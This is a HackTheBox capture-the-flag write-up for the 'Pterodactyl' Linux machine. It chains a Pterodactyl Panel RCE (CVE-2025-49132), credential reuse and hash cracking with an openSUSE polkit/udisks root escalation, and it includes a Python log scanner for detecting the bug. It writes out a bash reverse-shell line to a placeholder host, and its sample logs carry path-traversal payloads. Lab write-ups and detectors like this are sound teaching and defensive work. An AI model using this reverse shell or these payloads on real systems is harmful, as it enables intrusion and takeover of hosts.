HackTheBox: Pterodactyl
OS: Linux
Difficulty: Medium
Review: 4/5
Description:
Pterodactyl is a medium-difficulty Linux machine that runs Pterodactyl Panel on the panel virtual host. The Panel is vulnerable to CVE-2025-49132, an unauthenticated Remote Code Execution vulnerability in the locales/locale.json endpoint. This endpoint accepts user-controlled locale and namespace parameters and uses them to dynamically require the resulting PHP file. The attacker can chain this with PHP’s bundled pearcmd.php to write an arbitrary PHP file and gain command execution as the wwwrun user. The same bug also leaks the Panel’s database credentials from config/database.php. Although a public PoC exists, it requires a small tweak to match the target’s PEAR installation path for successful exploitation. The leaked database credentials are reused against the local MariaDB instance to dump the users table, exposing a bcrypt hash for phileasfogg3. The hash is cracked offline with John the Ripper, and the recovered password is reused for SSH access. For privilege escalation, the attacker abuses the chained OpenSUSE 15 LPE published by Qualys (CVE-2025-6018 and CVE-2025-6019). By forging XDG_SEAT and XDG_VTNR environment variable overrides within .pam_environment, the attacker gains allow_active polkit rights. These privileges allow triggering a udisks XFS resize on an attacker-controlled image, resulting in a root-owned SUID bash binary being written to the disk.
Recon:
As everyone can guess, we are starting out with a Rustscan:
rustscan -a $IP -n --ulimit 70000 -t 5000 -- -A -Pn
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 9.6 (protocol 2.0)
| ssh-hostkey:
| 256 a3741ea3ad02140100e6abb4188416e0 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBOouXDOkVrDkob+tyXJOHu3twWDqor3xlKgyYmLIrPasaNjhBW/xkGT2otP1zmnkTUyGfzEWZGkZB2Jkaivmjgc=
| 256 65c833177ad6523d63c3e4a960642dcc (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJTXNuX5oJaGQJfvbga+jM+14w5ndyb0DN0jWJHQCDd9
80/tcp open http syn-ack nginx 1.21.5
|_http-server-header: nginx/1.21.5
| http-methods:
|_ Supported Methods: GET HEAD OPTIONS
|_http-title: Did not follow redirect to http://pterodactyl.htb/
Rustscan output
Based on the output, this is looking to be a web box, which will mean a foothold gained through information disclosure or exploitation. Before we go further, we can add the redirected domain to our local hosts file.

Pterodactyl.htb
Heading to the site, we see a Minecraft server, which we can also add to the /etc/hosts file for further enumeration.

Checking Wappalyzer, we can see some of the underlying technology stack, which can be annotated for later.

FFuF:
With the basic recon complete, we can start fuzzing the endpoint to gather some data.



Based on the FFuF output, we can add another VHost:

Looking at the discovered files, we can see one of note: changelog.txt.

From this output, we can see a panel version; since we also have the panel VHost, this is worth looking into further.
CVE-2025-49132 + Initial Access:
Our research into this panel version turned up a CVE that allows RCE:
Digging further, we found the PoC below, which failed when we first attempted to use it.
After a bit of modification, thanks to AI, we got a working PoC:
With the new version, we can see we now have RCE.
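From the defender's side, the description above gives enough to hunt for this bug in web server logs: the vulnerable endpoint is /locales/locale.json, and its locale and namespace query parameters should only ever carry plain language or translation-namespace tokens. The script below is an added example, not part of the original writeup or the Pterodactyl project; it parses nginx combined-format access logs and flags any locale.json request whose parameters contain anything other than a simple token (traversal sequences, slashes, encoded variants). The log lines are constructed samples, and the assumption that legitimate values match `[A-Za-z0-9_-]+` is mine.

```python
"""Detect CVE-2025-49132-style locale.json abuse in nginx access logs.

Added example, not part of the original writeup. The only facts taken from the
writeup are the endpoint path (/locales/locale.json) and that its `locale` and
`namespace` parameters are used to build a PHP include path. The sample log
lines are constructed, not real traffic.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# nginx "combined" format: ip - user [time] "METHOD path proto" status size "ref" "ua"
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')

# Assumption: a legitimate locale code or namespace is letters, digits, '_' or '-'.
SAFE_PARAM = re.compile(r"^[A-Za-z0-9_-]+$")

# Constructed sample traffic: one benign locale request, three abusive ones, one unrelated.
SAMPLE_LOG = """\
10.10.14.5 - - [01/Jan/2025:10:00:00 +0000] "GET /locales/locale.json?locale=en_US&namespace=auth HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.10.14.5 - - [01/Jan/2025:10:00:01 +0000] "GET /locales/locale.json?locale=../../../../../../usr/share/php&namespace=pearcmd HTTP/1.1" 200 1024 "-" "curl/8.0"
10.10.14.5 - - [01/Jan/2025:10:00:02 +0000] "GET /locales/locale.json?locale=..%2f..%2f..%2fconfig&namespace=database HTTP/1.1" 200 2048 "-" "curl/8.0"
10.10.14.5 - - [01/Jan/2025:10:00:03 +0000] "GET /locales/locale.json?locale=%252e%252e%252fconfig&namespace=app HTTP/1.1" 500 0 "-" "curl/8.0"
10.10.14.5 - - [01/Jan/2025:10:00:04 +0000] "GET /index.php HTTP/1.1" 200 100 "-" "Mozilla/5.0"
"""


def fully_unquote(value, rounds=3):
    """Undo repeated percent-encoding so %252e%252e%252f still reads as ../."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def check_locale_request(path):
    """Return a reason string if `path` is a suspicious locale.json request, else None."""
    parts = urlsplit(path)
    if not parts.path.endswith("/locales/locale.json"):
        return None
    # parse_qs decodes one layer of percent-encoding; fully_unquote handles the rest.
    params = parse_qs(parts.query, keep_blank_values=True)
    for name in ("locale", "namespace"):
        for raw in params.get(name, []):
            value = fully_unquote(raw)
            if not SAFE_PARAM.match(value):
                return f"{name}={value!r} is not a plain locale/namespace token"
    return None


def scan_access_log(text):
    """Return (client_ip, status, path, reason) for every suspicious request in `text`."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, _ts, _method, path, status = m.groups()
        reason = check_locale_request(path)
        if reason:
            findings.append((ip, int(status), path, reason))
    return findings


if __name__ == "__main__":
    for ip, status, path, reason in scan_access_log(SAMPLE_LOG):
        print(f"{ip} {status} {path}\n    -> {reason}")
```

Because the allow-list is positive (only simple tokens pass), it catches encoded and double-encoded traversal without a deny-list of specific strings, and a 500 response is reported just like a 200, since a failed attempt is still worth knowing about.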

With RCE, we can now get ourselves a reverse shell:
- Create a bash file, rev.sh, and host it via updog.
cat rev.sh
/bin/bash -c "/bin/bash -i >& /dev/tcp/x.x.x.x/443 0>&1"
- Start a Penelope listener.

- Curl and execute our file to gain a shell.

Low Level Access:
After some enumeration, I found that I was able to use the panel credentials to gain access to the MySQL database, which allowed for the discovery of password hashes that I could crack offline to gain access to phileasfogg3.



I could then use su or SSH to obtain a shell as this user.
This part had me quite flustered, as I originally went down a rabbit hole with MySQL credentials for a while before taking a break.
However, after some more enumeration, we can see the version of Linux running is openSUSE Leap 15.6.

This specific version is also vulnerable to CVE-2025-6019.
https://cdn2.qualys.com/2025/06/17/suse15-pam-udisks-lpe.txt
Privilege Escalation via CVE-2025-6019:
Some more research led me to the PoC below, which we will use to escalate privileges:
- Create a local xfs.image and transfer the image and exploit to the target.


- Remove the mkfs.xfs call from the exploit code; the host does not have mkfs.xfs installed, so the PoC would otherwise fail.

- Run the exploit with the -c flag targeting our image to gain a root shell.
